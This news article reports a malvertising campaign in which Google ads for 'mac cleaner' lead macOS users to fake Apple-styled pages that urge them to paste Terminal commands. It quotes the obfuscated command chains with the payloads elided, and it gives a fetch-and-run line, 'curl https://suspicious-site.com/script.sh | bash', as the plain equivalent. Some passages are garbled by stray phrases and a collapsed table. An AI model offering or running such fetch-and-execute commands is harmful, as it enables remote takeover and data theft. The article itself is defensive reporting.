Cybercriminals have taken control of Google Search Ads for "mac cleaner" queries, deceiving macOS users into visiting phony websites that imitate Apple's layout This article explores malware google ads. . These sponsored results deliver remote code execution (RCE) payloads while promising speedy storage fixes.

The scheme was uncovered by security researchers, who discovered obfuscated commands that silently download and execute malware. Google Ads accounts, possibly compromised, fuel the abuse. The fraud begins innocently. Top sponsored links from seemingly reputable advertisers like "Nathaniel Josue Rodriguez" and "Aloha Shirt Shop" appear when users search for "mac cleaner."

Clicks lead to Google Apps Script pages (script.google.com/macros) styled like Apple’s site, complete with non-functional navigation menus. Fake instructions ask users to use Terminal commands to "free up disk space" or "check storage." Do not run them, researchers caution.

Obfuscated Payloads Exposed This command chain is pushed by one malicious page: echo "Cleaning macOS Storage..." echo '...' | base64 -D echo 'Installing packages please wait...' The "echo 'Cleaning macOS Storage..." mimics routine maintenance and diverts users. Base64 encoding is where the true danger lies. advertisements that direct you to reliable websites (Source: mackeeper) The base64 -D flag decodes it into a shell command that fetches and executes a remote script with user permissions.

It's just social engineering for RCE; no real cleaning takes place. A second page employs a more covert strategy: /bin/bash -c (echo '...' | base64 -d | curl -fsSL)" Here, $(...) substitutes command output.

After decoding a hidden URL, it pipes the script to bash for immediate execution and silently downloads it using curl -fsSL (-f fails silently, -s suppresses progress, -S shows errors only, -L follows redirects). This is the same as curl https://suspicious-site.com/script.sh | bash, but it has been obfuscated to avoid detection. Possible Risks and the Attack Chain Attackers are given complete shell access by these payloads.

Downloaded scripts could: Install persistent malware or adware. Steal browser data, passwords, or SSH keys. Install remote control backdoors. Mine cryptocurrency using Mac resources.

files to command-and-control servers through exfiltration. Disable security tools or change system settings. Silent flags ensure no pop-ups alert victims. This strategy mimics popular vectors such as supply chain attacks, malware installers, and phony GitHub READMEs.

Malicious Mac Cleaner Ads Scam (Source: mackeeper) Although root damage is limited by macOS's user-level execution, user-writable paths still pose a risk of data theft and persistence. Technique An explanation Base64 Impact Coding Hides commands in innocent-looking strings Bypasses basic scanners curl | bash silently downloads and runs remote scripts RCE is enabled without files Apple User Interface Imitation False menus create a false sense of trust. increases the rate at which commands are executed Google Applications Script Leverages trusted domains Evades ad blockers According to MacKeeper, researchers confirmed the ads redirect from trusted-looking domains like docs.google.com previews to these scripts.

No CVEs tie directly, but it exploits user trust in Google and Apple branding. Advertiser profiles raise red flags. “Nathaniel Josue Rodriguez” (Google Transparency ID: AR03742598973764927489) runs benign ads elsewhere. “Aloha Shirt Shop” (AR00152784596742701057) shows one suspicious entry.

Verified advertisers receive prime ad placement, increasing reach, which is probably explained by hacked accounts. In light of their increasing storage requirements, macOS users looking for disk cleanup are the target of this wave of malvertising. Similar scams hit Windows “PC optimizers” before.

Make Cyberpress a Google Preferred Source.